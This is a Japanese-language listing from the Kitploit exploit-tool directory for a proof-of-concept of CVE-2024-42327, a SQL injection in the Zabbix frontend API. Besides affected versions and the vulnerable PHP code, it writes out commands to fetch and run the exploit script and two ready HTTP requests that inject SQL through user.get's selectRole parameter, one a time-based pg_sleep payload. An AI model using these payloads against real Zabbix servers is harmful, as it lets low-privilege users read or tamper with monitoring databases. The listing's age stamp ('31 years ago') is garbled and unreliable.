Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-42327 — ZabbixフロントエンドAPIのSQLインジェクション脆弱性CVE-2024-42327の概念実証エクスプロイト。非管理者ユーザーがuser.getメソッドを介して任意のSQLクエリを実行できるようにする。 | Kitploit
ツール/GitHubGitHub/depers-rus/cve-2024-42327
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubdepers-rus/cve-2024-42327

CVE-2024-42327

ZabbixフロントエンドAPIのSQLインジェクション脆弱性CVE-2024-42327の概念実証エクスプロイト。非管理者ユーザーがuser.getメソッドを介して任意のSQLクエリを実行できるようにする。

リポジトリを見る
31年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-42327 / ZBX-25623 の PoC とエクスプロイト

Zabbix フロントエンドにデフォルトの User ロール、または API アクセスを許可するその他のロールを持つ非管理者ユーザーアカウントは、この脆弱性を悪用できます。CUser クラスの addRelatedObjects 関数に SQLi が存在します。この関数は、API アクセスを持つすべてのユーザーが利用できる CUser.get 関数から呼び出されます。

画像

脆弱性のあるバージョン: 6.0.0 - 6.0.31, 6.4.0 - 6.4.16 , 7.0.0

修正済みバージョン: 6.0.32rc1 , 6.4.17rc1, 7.0.1rc1

脆弱なコード

root@kitploit:~
$db_roles = DBselect(
	'SELECT u.userid'.($options['selectRole'] ? ',r.'.implode(',r.', $options['selectRole']) : '').
	' FROM users u,role r'.
	' WHERE u.roleid=r.roleid'.
	' AND '.dbConditionInt('u.userid', $userIds)
);

エクスプロイトの使用:

root@kitploit:~
git clone https://github.com/depers-rus/CVE-2024-42327
python3 cve-2024-42327-PoC.py -t zabbix.xyz.ru -u "depers" -p "passwd"

リクエスト:

root@kitploit:~
POST /api_jsonrpc.php  HTTP/1.1
Host: zabbix.xyz.ru
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 186
Content-Type: application/json

{"jsonrpc": "2.0", "method":"user.get", "params": {"selectRole": ["roleid,{SQLi payload}"
], "userids": ["10"
]}, "auth": "---auth_token---", "id": 1}

BurpSuite PoC (時間ベースのSQLi)

root@kitploit:~
SELECT pg_sleep(10)) AS DELAY
root@kitploit:~
POST /api_jsonrpc.php  HTTP/1.1
Host: zabbix.xyz.ru
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 186
Content-Type: application/json

{"jsonrpc": "2.0", "method":"user.get", "params": {"selectRole": ["roleid,(SELECT pg_sleep(10)) AS DELAY"
], "userids": ["10"
]}, "auth": "---auth_token---", "id": 1}

実証

画像

参照

  • https://support.zabbix.com/browse/ZBX-25623
  • https://nvd.nist.gov/vuln/detail/CVE-2024-42327
ツールをダウンロード